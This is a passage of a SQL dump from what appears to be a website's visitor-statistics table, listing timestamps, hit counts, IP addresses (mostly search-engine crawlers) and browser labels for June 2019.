,0,'66.249.66.136','chrome'),(431119,1561593844,1,1,0,0,'141.8.142.103','other'),(431120,1561594247,1,1,0,0,'5.45.207.19','other'),(431121,1561594333,3,3,0,0,'66.249.66.136','chrome'),(431122,1561594464,1,1,0,0,'66.249.66.68','chrome'),(431123,1561594566,1,1,0,0,'8.29.198.25','other'),(431124,1561594600,1,1,0,0,'8.29.198.27','other'),(431125,1561594746,1,1,0,0,'66.249.66.138','chrome'),(431126,1561595397,1,1,0,0,'207.46.13.188','other'),(431127,1561596131,2,2,0,0,'66.249.66.64','chrome'),(431128,1561596216,1,1,0,0,'66.249.66.66','chrome'),(431129,1561596351,1,1,0,0,'66.249.66.134','chrome'),(431130,1561596376,1,1,0,0,'95.163.255.94','other'),(431131,1561596780,1,1,0,0,'66.249.66.138','chrome'),(431132,1561597662,2,2,0,0,'66.249.66.136','chrome'),(431133,1561597830,1,1,0,0,'66.249.66.64','chrome'),(431134,1561597907,1,1,0,0,'66.249.66.138','chrome'),(431135,1561597934,2,2,0,0,'66.249.66.66','chrome'),(431136,1561598001,2,2,0,0,'13.66.139.0','other'),(431137,1561598918,1,1,0,0,'157.55.39.245','other'),(431138,1561599021,3,3,0,0,'66.249.66.134','chrome'),(431139,1561599340,1,1,0,0,'207.46.13.188','other'),(431140,1561599361,1,1,0,0,'5.45.207.79','other'),(431141,1561599972,1,1,0,0,'178.255.215.94','other'),(431142,1561600569,4,4,0,0,'66.249.66.136','chrome'),(431143,1561600670,4,4,0,0,'66.249.66.134','chrome'),(431144,1561600781,1,1,0,0,'66.249.66.68','chrome'),(431145,1561600908,1,1,0,0,'40.77.167.3','other'),(431146,1561601653,2,2,0,0,'207.46.13.188','other'),(431147,1561602000,1,1,0,0,'66.249.66.64','chrome'),(431148,1561602291,3,3,0,0,'66.249.66.134','chrome'),(431149,1561602314,3,3,0,0,'66.249.66.138','chrome'),(431150,1561602334,2,2,0,0,'66.249.66.136','chrome'),(431151,1561602440,2,2,0,0,'66.249.66.68','chrome'),(431152,1561603528,1,1,0,0,'157.55.39.225','other'),(431153,1561603724,2,2,0,0,'66.249.66.64','chrome'),(431154,1561603785,1,1,0,0,'66.249.66.66','chrome'),(431155,1561603845,3,3,0,0,'66.249.66.136','chrome'),(431156,1561603865,2,2,0,0,'66.249.66.68','chrome'),(431157,1561603939,4,4,0,0,'66.249.66.134','chrome'),(431158,1561604567,1,1,0,0,'207.46.13.188','other'),(431159,1561605441,1,1,0,0,'66.249.66.138','chrome'),(431160,1561605445,1,1,0,0,'8.29.198.26','other'),(431161,1561605482,1,1,0,0,'8.29.198.25','other'),(431162,1561605665,1,1,0,0,'207.46.13.188','other'),(431163,1561605773,2,2,0,0,'207.46.13.93','other'),(431164,1561606012,15,15,0,0,'66.249.66.134','chrome'),(431165,1561606154,1,1,0,0,'66.249.66.66','chrome'),(431166,1561606288,5,5,0,0,'66.249.66.136','chrome'),(431167,1561606443,2,2,0,0,'66.249.66.138','chrome'),(431168,1561607017,3,3,0,0,'66.249.66.134','chrome'),(431169,1561607555,1,1,0,0,'87.250.224.47','other'),(431170,1561607609,1,1,0,0,'178.154.244.11','other'),(431171,1561607630,3,3,0,0,'66.249.66.136','chrome'),(431172,1561608121,1,1,0,0,'46.211.44.111','chrome'),(431173,1561608974,1,1,0,0,'66.249.66.66','chrome'),(431174,1561609394,1,1,0,0,'66.249.66.136','chrome'),(431175,1561609468,1,1,0,0,'66.249.66.134','chrome'),(431176,1561609775,3,3,0,0,'207.46.13.188','other'),(431177,1561610212,1,1,0,0,'5.255.253.16','other'),(431178,1561610346,1,1,0,0,'40.77.167.3','other'),(431179,1561610693,3,3,0,0,'66.249.66.136','chrome'),(431180,1561610750,4,4,0,0,'66.249.66.134','chrome'),(431181,1561611002,2,2,0,0,'66.249.66.138','chrome'),(431182,1561611025,2,2,0,0,'66.249.66.68','chrome'),(431183,1561611313,1,1,0,0,'207.46.13.112','other'),(431184,1561611475,1,1,0,0,'178.154.244.11','other'),(431185,1561611667,2,2,0,0,'66.249.66.134','chrome'),(431186,1561612045,1,1,0,0,'157.55.39.237','other'),(431187,1561612208,2,2,0,0,'66.249.66.64','chrome'),(431188,1561612238,3,3,0,0,'66.249.66.66','chrome'),(431189,1561612527,1,1,0,0,'66.249.66.68','chrome'),(431190,1561612692,1,1,0,0,'66.249.66.136','chrome'),(431191,1561612854,1,1,0,0,'66.249.66.138','chrome'),(431192,1561612956,1,1,0,0,'66.249.66.134','chrome'),(431193,1561613109,1,1,0,0,'66.249.66.64','chrome'),(431194,1561613810,2,2,0,0,'66.249.66.138','chrome'),(431195,1561614249,1,1,0,0,'178.17.166.147','other'),(431196,1561614328,3,3,0,0,'66.249.66.134','chrome'),(431197,1561615492,1,1,0,0,'207.46.13.112','other'),(431198,1561615520,1,1,0,0,'66.249.66.66','chrome'),(431199,1561615734,1,1,0,0,'5.45.207.79','other'),(431200,1561615741,3,3,0,0,'66.249.66.136','chrome'),(431201,1561615857,1,1,0,0,'178.154.244.11','other'),(431202,1561615989,2,2,0,0,'176.9.9.94','other'),(431203,1561616127,1,1,0,0,'66.249.66.64','chrome'),(431204,1561616258,1,1,0,0,'66.249.66.134','chrome'),(431205,1561616334,2,2,0,0,'8.29.198.27','other'),(431206,1561616417,1,1,0,0,'66.249.66.138','chrome'),(431207,1561616643,1,1,0,0,'54.36.149.13','other'),(431208,1561617713,1,1,0,0,'66.249.66.134','chrome'),(431209,1561617933,1,1,0,0,'157.55.39.74','other'),(431210,1561617981,1,1,0,0,'66.249.66.136','chrome'),(431211,1561618630,1,1,0,0,'207.46.13.112','other'),(431212,1561618829,1,1,0,0,'54.36.149.44','other'),(431213,1561618886,2,2,0,0,'66.249.66.66','chrome'),(431214,1561619349,5,5,0,0,'66.249.66.134','chrome'),(431215,1561619691,1,1,0,0,'95.163.255.197','other'),(431216,1561619711,1,1,0,0,'13.66.139.0','other'),(431217,1561619955,1,1,0,0,'66.249.66.136','chrome'),(431218,1561620253,1,1,0,0,'66.249.66.138','chrome'),(431219,1561620264,1,1,0,0,'157.55.39.131','other'),(431220,1561620614,1,1,0,0,'54.36.149.86','other'),(431221,1561620728,1,1,0,0,'178.92.159.108','chrome'),(431222,1561621587,2,2,0,0,'66.249.66.134','chrome'),(431223,1561621731,1,1,0,0,'66.249.66.66','chrome'),(431224,1561621842,1,1,0,0,'66.249.66.68','chrome'),(431225,1561622047,1,1,0,0,'91.196.178.169','chrome'),(431226,1561622159,1,1,0,0,'178.154.244.11','other'),(431227,1561622419,1,1,0,0,'141.8.142.162','other'),(431228,1561622424,1,1,0,0,'5.45.207.19','other'),(431229,1561622915,2,2,0,0,'66.249.66.138','chrome'),(431230,1561623170,1,1,0,0,'91.196.178.78','firefox'),(431231,1561623731,1,1,0,0,'66.249.66.66','chrome'),(431232,1561623964,1,1,0,0,'54.36.149.88','other'),(431233,1561624156,3,3,0,0,'91.196.178.78','firefox'),(431234,1561624261,1,1,0,0,'54.36.149.68','other'),(431235,1561624510,2,2,0,0,'66.249.66.134','chrome'),(431236,1561624524,1,1,0,0,'66.249.66.64','chrome'),(431237,1561625120,1,1,0,0,'66.249.66.136','chrome'),(431238,1561625553,1,1,0,0,'54.36.149.93','other'),(431239,1561625865,1,1,0,0,'157.55.39.109','other'),(431240,1561625919,1,1,0,0,'176.9.9.94','other'),(431241,1561625973,1,1,0,0,'54.36.149.94','other'),(431242,1561626536,3,3,0,0,'66.249.66.134','chrome'),(431243,1561626673,1,1,0,0,'54.36.149.76','other'),(431244,1561626851,1,1,0,0,'66.249.66.138','chrome'),(431245,1561627048,1,1,0,0,'37.55.150.191','chrome'),(431246,1561627077,1,1,0,0,'5.45.207.19','other'),(431247,1561627214,2,2,0,0,'8.29.198.27','other'),(431248,1561627325,1,1,0,0,'54.36.149.95','other'),(431249,1561627536,1,1,0,0,'94.153.229.229','chrome'),(431250,1561628139,2,2,0,0,'66.249.66.138','chrome'),(431251,1561628325,1,1,0,0,'66.249.66.64','chrome'),(431252,1561628346,3,3,0,0,'66.249.66.134','chrome'),(431253,1561628462,1,1,0,0,'207.46.13.31','other'),(431254,1561628478,1,1,0,0,'66.249.66.68','chrome'),(431255,1561628494,1,1,0,0,'157.55.39.74','other'),(431256,1561628685,1,1,0,0,'66.249.66.136','chrome'),(431257,1561629224,1,1,0,0,'66.249.66.138','chrome'),(431258,1561629359,1,1,0,0,'185.151.104.235','chrome'),(431259,1561629472,1,1,0,0,'157.55.39.74','other'),(431260,1561629543,1,1,0,0,'66.249.66.64','chrome'),(431261,1561629845,1,1,0,0,'54.36.149.59','other'),(431262,1561630007,1,1,0,0,'207.46.13.31','other'),(431263,1561630023,1,1,0,0,'66.249.66.136','chrome'),(431264,1561630055,1,1,0,0,'54.183.190.166','chrome'),(431265,1561630062,1,1,0,0,'54.219.131.66','chrome'),(431266,1561630064,9,9,0,0,'13.57.196.120','chrome'),(431267,1561630163,1,1,0,0,'66.249.66.138','chrome'),(431268,1561630505,1,1,0,0,'66.249.66.134','chrome'),(431269,1561630897,1,1,0,0,'54.36.149.101','other'),(431270,1561631017,1,1,0,0,'109.74.154.72','chrome'),(431271,1561631493,2,2,0,0,'66.249.66.134','chrome'),(431272,1561631521,1,1,0,0,'37.9.113.20','other'),(431273,1561631529,1,1,0,0,'178.154.200.48','other'),(431274,1561631531,1,1,0,0,'95.108.213.50','other'),(431275,1561631533,1,1,0,0,'54.36.149.3','other'),(431276,1561631938,1,1,0,0,'213.180.203.17','other'),(431277,1561632065,1,1,0,0,'95.133.238.74','chrome'),(431278,1561632228,2,2,0,0,'66.249.66.66','chrome'),(431279,1561632493,1,1,0,0,'66.249.66.138','chrome'),(431280,1561632503,1,1,0,0,'157.55.39.83','other'),(431281,1561632506,2,2,0,0,'66.249.66.134','chrome'),(431282,1561632990,1,1,0,0,'54.36.149.3','other'),(431283,1561633052,1,1,0,0,'91.196.178.80','chrome'),(431284,1561633424,1,1,0,0,'128.124.29.30','chrome'),(431285,1561634472,3,3,0,0,'66.249.66.134','chrome'),(431286,1561634498,1,1,0,0,'54.36.149.49','other'),(431287,1561634573,1,1,0,0,'54.36.149.99','other'),(431288,1561634578,1,1,0,0,'157.55.39.67','other'),(431289,1561634606,1,1,0,0,'54.36.149.97','other'),(431290,1561634662,1,1,0,0,'66.249.66.136','chrome'),(431291,1561634686,1,1,0,0,'95.163.255.93','other'),(431292,1561634827,1,1,0,0,'66.249.66.138','chrome'),(431293,1561635170,1,1,0,0,'176.9.9.94','other'),(431294,1561635957,1,1,0,0,'66.249.66.134','chrome'),(431295,1561636261,1,1,0,0,'54.36.149.69','other'),(431296,1561636724,3,3,0,0,'66.249.66.136','chrome'),(431297,1561636750,1,1,0,0,'66.249.66.138','chrome'),(431298,1561637954,2,2,0,0,'157.55.39.67','other'),(431299,1561638113,1,1,0,0,'8.29.198.25','other'),(431300,1561638166,1,1,0,0,'8.29.198.26','other'),(431301,1561638191,1,1,0,0,'66.249.66.66','chrome'),(431302,1561638230,2,2,0,0,'66.249.66.136','chrome'),(431303,1561638322,1,1,0,0,'66.249.66.64','chrome'),(431304,1561638435,4,4,0,0,'66.249.66.138','chrome'),(431305,1561638455,1,1,0,0,'54.36.149.18','other'),(431306,1561638693,2,2,0,0,'66.249.66.134','chrome'),(431307,1561638726,1,1,0,0,'54.36.149.73','other'),(431308,1561639115,1,1,0,0,'54.36.149.13','other'),(431309,1561639419,1,1,0,0,'54.36.149.49','other'),(431310,1561639503,1,1,0,0,'157.55.39.109','other'),(431311,1561640379,1,1,0,0,'207.46.13.31','other'),(431312,1561640469,1,1,0,0,'66.249.66.136','chrome'),(431313,1561640911,1,1,0,0,'54.36.149.94','other'),(431314,1561641036,1,1,0,0,'66.249.66.66','chrome'),(431315,1561641156,1,1,0,0,'54.36.149.60','other'),(431316,1561641456,1,1,0,0,'207.46.13.93','other'),(431317,1561641806,1,1,0,0,'157.55.39.109','other'),(431318,1561641924,1,1,0,0,'95.132.63.39','chrome'),(431319,1561642434,1,1,0,0,'66.249.66.66','chrome'),(431320,1561642513,1,1,0,0,'54.36.149.76','other'),(431321,1561642579,1,1,0,0,'157.55.39.67','other'),(431322,1561642687,3,3,0,0,'66.249.66.134','chrome'),(431323,1561642733,1,1,0,0,'66.249.66.68','chrome'),(431324,1561642801,1,1,0,0,'66.249.66.138','chrome'),(431325,1561643042,1,1,0,0,'207.46.13.31','other'),(431326,1561643110,1,1,0,0,'66.249.66.136','chrome'),(431327,1561644051,1,1,0,0,'40.77.167.111','other'),(431328,1561644243,1,1,0,0,'54.36.149.10','other'),(431329,1561644389,2,2,0,0,'66.249.66.134','chrome'),(431330,1561644619,2,2,0,0,'66.249.66.138','chrome'),(431331,1561644680,1,1,0,0,'66.249.66.64','chrome'),(431332,1561644780,1,1,0,0,'66.249.66.136','chrome'),(431333,1561646357,1,1,0,0,'5.45.207.79','other'),(431334,1561646675,1,1,0,0,'5.45.207.19','other'),(431335,1561646825,1,1,0,0,'66.249.66.64','chrome'),(431336,1561647036,1,1,0,0,'66.249.66.134','chrome'),(431337,1561647617,1,1,0,0,'54.36.149.48','other'),(431338,1561647622,1,1,0,0,'37.52.22.54','chrome'),(431339,1561648272,2,2,0,0,'66.249.66.138','chrome'),(431340,1561648468,1,1,0,0,'207.46.13.63','other'),(431341,1561648732,2,2,0,0,'66.249.66.136','chrome'),(431342,1561649051,1,1,0,0,'8.29.198.27','other'),(431343,1561649053,1,1,0,0,'8.29.198.26','other'),(431344,1561649407,1,1,0,0,'46.211.130.59','other'),(431345,1561650118,2,2,0,0,'207.46.13.63','other'),(431346,1561650193,1,1,0,0,'37.73.225.185','chrome'),(431347,1561650203,1,1,0,0,'66.249.66.136','chrome'),(431348,1561650413,1,1,0,0,'77.111.244.30','chrome'),(431349,1561650521,2,2,0,0,'207.46.13.38','other'),(431350,1561651275,3,3,0,0,'66.249.66.64','chrome'),(431351,1561651328,1,1,0,0,'46.211.52.190','chrome'),(431352,1561651795,3,3,0,0,'66.249.66.136','chrome'),(431353,1561651980,1,1,0,0,'66.249.66.66','chrome'),(431354,1561652041,1,1,0,0,'66.249.66.138','chrome'),(431355,1561652223,2,2,0,0,'91.196.178.48','chrome'),(431356,1561652278,1,1,0,0,'66.249.66.68','chrome'),(431357,1561652597,1,1,0,0,'207.46.13.63','other'),(431358,1561653205,1,1,0,0,'54.36.149.72','other'),(431359,1561653308,1,1,0,0,'176.9.9.94','other'),(431360,1561653569,1,1,0,0,'54.36.149.28','other'),(431361,1561653668,1,1,0,0,'66.249.66.134','chrome'),(431362,1561654008,2,2,0,0,'66.249.66.136','chrome'),(431363,1561654146,1,1,0,0,'157.55.39.64','other'),(431364,1561654201,1,1,0,0,'66.249.66.64','chrome'),(431365,1561654405,1,1,0,0,'157.55.39.186','other'),(431366,1561655006,2,2,0,0,'66.249.66.134','chrome'),(431367,1561655097,1,1,0,0,'40.77.167.102','other'),(431368,1561656083,1,1,0,0,'157.55.39.64','other'),(431369,1561656091,1,1,0,0,'66.249.66.66','chrome'),(431370,1561656323,2,2,0,0,'66.249.66.136','chrome'),(431371,1561656493,1,1,0,0,'66.249.66.134','chrome'),(431372,1561656499,1,1,0,0,'207.46.13.63','other'),(431373,1561656662,1,1,0,0,'66.249.66.64','chrome'),(431374,1561657962,2,2,0,0,'66.249.66.136','chrome'),(431375,1561658231,1,1,0,0,'66.249.66.66','chrome'),(431376,1561658378,1,1,0,0,'66.249.66.68','chrome'),(431377,1561658393,3,3,0,0,'5.45.207.79','other'),(431378,1561658499,1,1,0,0,'66.249.66.134','chrome'),(431379,1561658722,2,2,0,0,'207.46.13.63','other'),(431380,1561658826,2,2,0,0,'207.46.13.57','other'),(431381,1561659011,1,1,0,0,'151.80.39.16','other'),(431382,1561659034,1,1,0,0,'54.36.149.82','other'),(431383,1561659198,2,2,0,0,'66.249.66.138','chrome'),(431384,1561659297,3,3,0,0,'66.249.66.64','chrome'),(431385,1561659516,1,1,0,0,'66.249.66.134','chrome'),(431386,1561659627,1,1,0,0,'66.249.66.136','chrome'),(431387,1561659795,1,1,0,0,'40.77.167.102','other'),(431388,1561659949,1,1,0,0,'8.29.198.26','other'),(431389,1561659950,1,1,0,0,'8.29.198.27','other'),(431390,1561660493,1,1,0,0,'207.46.13.63','other'),(431391,1561660523,1,1,0,0,'157.55.39.64','other'),(431392,1561660974,1,1,0,0,'151.80.39.16','other'),(431393,1561661139,1,1,0,0,'66.249.66.66','chrome'),(431394,1561661276,1,1,0,0,'54.36.149.30','other'),(431395,1561661848,1,1,0,0,'95.163.255.165','other'),(431396,1561661965,1,1,0,0,'54.36.149.14','other'),(431397,1561662033,1,1,0,0,'207.46.13.57','other'),(431398,1561662086,1,1,0,0,'54.36.149.86','other'),(431399,1561662251,1,1,0,0,'176.9.9.94','other'),(431400,1561662395,1,1,0,0,'5.45.207.19','other'),(431401,1561662454,1,1,0,0,'157.55.39.64','other'),(431402,1561662496,4,4,0,0,'66.249.66.136','chrome'),(431403,1561662709,5,5,0,0,'66.249.66.134','chrome'),(431404,1561662711,1,1,0,0,'66.249.66.64','chrome'),(431405,1561664061,1,1,0,0,'46.211.134.66','chrome'),(431406,1561664225,1,1,0,0,'40.77.167.102','other'),(431407,1561664267,3,3,0,0,'66.249.66.134','chrome'),(431408,1561664340,1,1,0,0,'193.106.30.98','chrome'),(431409,1561664342,1,1,0,0,'66.249.66.66','chrome'),(431410,1561664526,2,2,0,0,'66.249.66.136','chrome'),(431411,1561664590,1,1,0,0,'66.249.66.138','chrome'),(431412,1561664856,2,2,0,0,'207.46.13.57','other'),(431413,1561665384,1,1,0,0,'40.77.167.102','other'),(431414,1561665495,1,1,0,0,'66.249.66.138','chrome'),(431415,1561667049,1,1,0,0,'5.45.207.19','other'),(431416,1561667321,2,2,0,0,'178.154.244.11','other'),(431417,1561667345,1,1,0,0,'66.249.66.64','chrome'),(431418,1561667754,4,4,0,0,'66.249.66.134','chrome'),(431419,1561668315,1,1,0,0,'157.55.39.208','other'),(431420,1561668320,1,1,0,0,'157.55.39.64','other'),(431421,1561668371,1,1,0,0,'54.36.149.99','other'),(431422,1561668934,1,1,0,0,'66.249.66.68','chrome'),(431423,1561669313,1,1,0,0,'66.249.66.134','chrome'),(431424,1561669344,2,2,0,0,'66.249.66.136','chrome'),(431425,1561669789,1,1,0,0,'54.36.149.61','other'),(431426,1561670179,1,1,0,0,'54.36.149.11','other'),(431427,1561670596,1,1,0,0,'54.36.149.23','other'),(431428,1561670816,2,2,0,0,'8.29.198.25','other'),(431429,1561671000,1,1,0,0,'66.249.66.64','chrome'),(431430,1561671080,2,2,0,0,'66.249.66.134','chrome'),(431431,1561671324,1,1,0,0,'77.74.177.114','chrome'),(431432,1561671327,1,1,0,0,'77.74.177.113','chrome'),(431433,1561671439,1,1,0,0,'54.36.149.103','other'),(431434,1561671540,1,1,0,0,'157.55.39.240','other'),(431435,1561671857,1,1,0,0,'54.36.149.5','other'),(431436,1561672346,1,1,0,0,'54.36.149.94','other'),(431437,1561672400,1,1,0,0,'66.249.66.66','chrome'),(431438,1561672456,1,1,0,0,'176.9.9.94','other'),(431439,1561672460,2,2,0,0,'66.249.66.68','chrome'),(431440,1561672645,1,1,0,0,'66.249.66.136','chrome'),(431441,1561672646,1,1,0,0,'66.249.66.64','chrome'),(431442,1561673121,1,1,0,0,'157.55.39.208','other'),(431443,1561673149,1,1,0,0,'51.255.65.46','other'),(431444,1561674072,1,1,0,0,'66.249.66.64','chrome'),(431445,1561674080,2,2,0,0,'66.249.66.66','chrome'),(431446,1561674151,1,1,0,0,'40.77.167.102','other'),(431447,1561674205,1,1,0,0,'66.249.66.68','chrome'),(431448,1561674659,55,55,0,0,'66.249.66.134','chrome'),(431449,1561675193,2,2,0,0,'66.249.66.138','chrome'),(431450,1561675197,15,15,0,0,'66.249.66.136','chrome'),(431451,1561675476,1,1,0,0,'40.77.167.150','other'),(431452,1561675602,1,1,0,0,'40.77.167.102','other'),(431453,1561675809,3,3,0,0,'66.249.66.64','chrome'),(431454,1561675852,1,1,0,0,'5.45.207.19','other'),(431455,1561676044,1,1,0,0,'66.249.66.134','chrome'),(431456,1561676151,1,1,0,0,'66.249.66.138','chrome'),(431457,1561676342,1,1,0,0,'54.36.149.81','other'),(431458,1561677120,1,1,0,0,'66.249.66.64','chrome'),(431459,1561677607,1,1,0,0,'157.55.39.240','other'),(431460,1561677725,1,1,0,0,'66.249.66.136','chrome'),(431461,1561677978,1,1,0,0,'95.163.255.92','other'),(431462,1561678214,1,1,0,0,'54.36.149.96','other'),(431463,1561678242,1,1,0,0,'141.8.142.103','other'),(431464,1561678367,1,1,0,0,'95.108.213.4','other'),(431465,1561678743,1,1,0,0,'54.36.149.51','other'),(431466,1561678997,1,1,0,0,'66.249.66.136','chrome'),(431467,1561679713,1,1,0,0,'66.249.66.138','chrome'),(431468,1561679900,2,2,0,0,'66.249.66.136','chrome'),(431469,1561680118,1,1,0,0,'66.249.66.68','chrome'),(431470,1561680273,1,1,0,0,'66.249.66.134','chrome'),(431471,1561680454,1,1,0,0,'54.36.149.15','other'),(431472,1561680663,1,1,0,0,'40.77.167.150','other'),(431473,1561680815,1,1,0,0,'95.108.181.83','other'),(431474,1561680906,1,1,0,0,'66.249.66.138','chrome'),(431475,1561681107,1,1,0,0,'40.77.167.129','other'),(431476,1561681572,2,2,0,0,'66.249.66.218','chrome'),(431477,1561681687,1,1,0,0,'8.29.198.27','other'),(431478,1561681703,1,1,0,0,'54.36.149.66','other'),(431479,1561681705,1,1,0,0,'8.29.198.26','other'),(431480,1561682404,1,1,0,0,'66.249.66.130','chrome'),(431481,1561682585,2,2,0,0,'66.249.66.220','chrome'),(431482,1561682896,1,1,0,0,'95.108.181.54','other'),(431483,1561682942,1,1,0,0,'54.36.149.105','other'),(431484,1561683221,1,1,0,0,'209.17.97.2','other'),(431485,1561683885,1,1,0,0,'66.249.66.128','chrome'),(431486,1561683900,2,2,0,0,'66.249.66.218','chrome'),(431487,1561684238,2,2,0,0,'66.249.66.220','chrome'),(431488,1561684292,2,2,0,0,'66.249.66.222','chrome'),(431489,1561684611,1,1,0,0,'54.36.149.76','other'),(431490,1561684898,1,1,0,0,'40.77.167.71','other'),(431491,1561685033,1,1,0,0,'66.249.66.128','chrome'),(431492,1561685120,1,1,0,0,'66.249.66.130','chrome'),(431493,1561685365,2,2,0,0,'66.249.66.132','chrome'),(431494,1561685399,2,2,0,0,'66.249.66.220','chrome'),(431495,1561685403,2,2,0,0,'66.249.66.218','chrome'),(431496,1561685839,1,1,0,0,'66.249.66.222','chrome'),(431497,1561685845,1,1,0,0,'54.36.149.81','other'),(431498,1561686142,1,1,0,0,'54.36.149.83','other'),(431499,1561686411,2,2,0,0,'157.55.39.125','other'),(431500,1561686961,1,1,0,0,'66.249.66.220','chrome'),(431501,1561687136,2,2,0,0,'66.249.66.128','chrome'),(431502,1561687322,1,1,0,0,'54.36.149.15','other'),(431503,1561687537,1,1,0,0,'157.55.39.141','other'),(431504,1561687627,1,1,0,0,'40.77.167.35','other'),(431505,1561687672,1,1,0,0,'40.77.167.71','other'),(431506,1561688310,1,1,0,0,'95.163.255.192','other'),(431507,1561688340,1,1,0,0,'66.249.66.132','chrome'),(431508,1561688358,1,1,0,0,'66.249.66.130','chrome'),(431509,1561688435,1,1,0,0,'13.66.139.0','other'),(431510,1561688462,2,2,0,0,'66.249.66.218','chrome'),(431511,1561689873,1,1,0,0,'54.36.149.83','other'),(431512,1561689907,1,1,0,0,'95.163.255.175','other'),(431513,1561689909,1,1,0,0,'95.163.255.172','other'),(431514,1561690106,1,1,0,0,'178.154.244.65','other'),(431515,1561690740,1,1,0,0,'207.46.13.89','other'),(431516,1561690821,1,1,0,0,'66.249.66.130','chrome'),(431517,1561690849,1,1,0,0,'109.173.85.172','msie'),(431518,1561691125,1,1,0,0,'66.249.66.220','chrome'),(431519,1561691576,1,1,0,0,'54.36.149.73','other'),(431520,1561691657,1,1,0,0,'157.55.39.125','other'),(431521,1561692365,1,1,0,0,'5.45.207.79','other'),(431522,1561692368,1,1,0,0,'178.154.244.11','other'),(431523,1561692555,2,2,0,0,'8.29.198.26','other'),(431524,1561692606,1,1,0,0,'157.55.39.125','other'),(431525,1561692619,1,0,1,0,'66.249.66.218',''),(431526,1561692775,1,1,0,0,'176.9.9.94','other'),(431527,1561692899,2,2,0,0,'66.249.66.220','chrome'),(431528,1561693226,2,2,0,0,'66.249.66.218','chrome'),(431529,1561693371,1,1,0,0,'178.154.244.11','other'),(431530,1561693429,1,1,0,0,'54.36.149.103','other'),(431531,1561693499,1,1,0,0,'54.36.149.83','other'),(431532,1561694008,2,2,0,0,'66.249.66.222','chrome'),(431533,1561694141,1,1,0,0,'95.163.255.187','other'),(431534,1561694195,2,2,0,0,'66.249.66.220','chrome'),(431535,1561694558,1,1,0,0,'95.163.255.96','other'),(431536,1561694576,1,1,0,0,'54.36.149.60','other'),(431537,1561694577,1,1,0,0,'66.249.66.128','chrome'),(431538,1561694624,2,2,0,0,'66.249.66.218','chrome'),(431539,1561695078,1,1,0,0,'66.249.66.222','chrome'),(431540,1561695159,1,1,0,0,'66.249.66.220','chrome'),(431541,1561695163,2,2,0,0,'66.249.66.132','chrome'),(431542,1561695181,1,1,0,0,'54.36.149.7','other'),(431543,1561695276,1,1,0,0,'40.77.167.71','other'),(431544,1561695474,1,1,0,0,'116.203.28.255','chrome'),(431545,1561695584,1,1,0,0,'157.55.39.125','other'),(431546,1561695929,1,1,0,0,'40.77.167.35','other'),(431547,1561696144,1,1,0,0,'66.249.66.130','chrome'),(431548,1561696159,1,1,0,0,'66.249.66.220','chrome'),(431549,1561696220,3,3,0,0,'66.249.66.218','chrome'),(431550,1561696537,3,3,0,0,'66.249.66.222','chrome'),(431551,1561697136,1,1,0,0,'213.180.203.48','other'),(431552,1561697361,2,2,0,0,'66.249.66.132','chrome'),(431553,1561697604,3,3,0,0,'66.249.66.220','chrome'),(431554,1561697754,1,1,0,0,'40.77.167.71','other'),(431555,1561697783,4,4,0,0,'66.249.66.222','chrome'),(431556,1561698164,8,8,0,0,'66.249.66.218','chrome'),(431557,1561698590,4,4,0,0,'66.249.66.220','chrome'),(431558,1561698633,3,3,0,0,'66.249.66.130','chrome'),(431559,1561698685,2,2,0,0,'91.196.178.134','firefox'),(431560,1561698941,1,1,0,0,'46.211.73.247','chrome'),(431561,1561699037,2,2,0,0,'66.249.66.222','chrome'),(431562,1561699306,1,1,0,0,'66.249.66.132','chrome'),(431563,1561699348,1,1,0,0,'66.249.66.198','chrome'),(431564,1561699424,6,6,0,0,'66.249.66.218','chrome'),(431565,1561699561,4,4,0,0,'66.249.66.220','chrome'),(431566,1561699811,1,1,0,0,'40.77.167.156','other'),(431567,1561699931,1,1,0,0,'66.249.66.196','chrome'),(431568,1561700010,1,1,0,0,'66.249.66.222','chrome'),(431569,1561700067,1,1,0,0,'66.249.66.193','chrome'),(431570,1561700273,1,1,0,0,'91.196.178.136','firefox'),(431571,1561700542,3,3,0,0,'66.249.66.220','chrome'),(431572,1561700552,5,5,0,0,'66.249.66.218','chrome'),(431573,1561700589,1,1,0,0,'66.249.66.130','chrome'),(431574,1561700658,1,1,0,0,'192.42.116.16','other'),(431575,1561700955,1,1,0,0,'66.249.66.196','chrome'),(431576,1561701096,1,1,0,0,'66.249.66.202','chrome'),(431577,1561701135,1,1,0,0,'66.249.66.128','chrome'),(431578,1561701270,2,2,0,0,'66.249.66.222','chrome'),(431579,1561701513,1,1,0,0,'157.55.39.125','other'),(431580,1561701664,1,1,0,0,'66.249.66.218','chrome'),(431581,1561701779,3,3,0,0,'66.249.66.132','chrome'),(431582,1561701863,1,1,0,0,'176.9.9.94','other'),(431583,1561702231,1,1,0,0,'95.163.255.92','other'),(431584,1561702530,1,1,0,0,'40.77.167.156','other'),(431585,1561703097,1,1,0,0,'66.249.66.218','chrome'),(431586,1561703402,2,2,0,0,'8.29.198.26','other'),(431587,1561703582,1,1,0,0,'37.9.113.148','other'),(431588,1561703617,2,2,0,0,'66.249.66.132','chrome'),(431589,1561704224,6,6,0,0,'66.249.66.218','chrome'),(431590,1561704316,3,3,0,0,'66.249.66.220','chrome'),(431591,1561704812,2,2,0,0,'66.249.66.222','chrome'),(431592,1561705095,1,1,0,0,'207.46.13.84','other'),(431593,1561705281,1,1,0,0,'66.249.66.132','chrome'),(431594,1561705336,1,1,0,0,'91.209.11.236','other'),(431595,1561705886,4,4,0,0,'157.55.39.57','other'),(431596,1561706117,1,1,0,0,'66.249.66.218','chrome'),(431597,1561706377,1,1,0,0,'66.249.66.220','chrome'),(431598,1561706470,6,6,0,0,'40.77.167.156','other'),(431599,1561706566,6,6,0,0,'40.77.167.169','other'),(431600,1561706575,4,4,0,0,'157.55.39.153','other'),(431601,1561706701,2,2,0,0,'66.249.66.130','chrome'),(431602,1561707325,3,3,0,0,'66.249.66.222','chrome'),(431603,1561707386,2,2,0,0,'66.249.66.220','chrome'),(431604,1561707852,1,1,0,0,'66.249.66.128','chrome'),(431605,1561708003,5,5,0,0,'66.249.66.218','chrome'),(431606,1561708203,1,1,0,0,'5.255.253.22','other'),(431607,1561708434,2,2,0,0,'40.77.167.147','other'),(431608,1561708472,2,2,0,0,'66.249.66.220','chrome'),(431609,1561708814,1,1,0,0,'13.66.139.0','other'),(431610,1561708949,1,1,0,0,'40.77.167.169','other'),(431611,1561709322,1,1,0,0,'157.55.39.57','other'),(431612,1561709427,1,1,0,0,'95.163.255.196','other'),(431613,1561709462,1,1,0,0,'66.249.66.220','chrome'),(431614,1561709933,2,2,0,0,'40.77.167.43','other'),(431615,1561710100,1,1,0,0,'87.250.224.99','other'),(431616,1561710532,1,1,0,0,'95.108.181.83','other'),(4316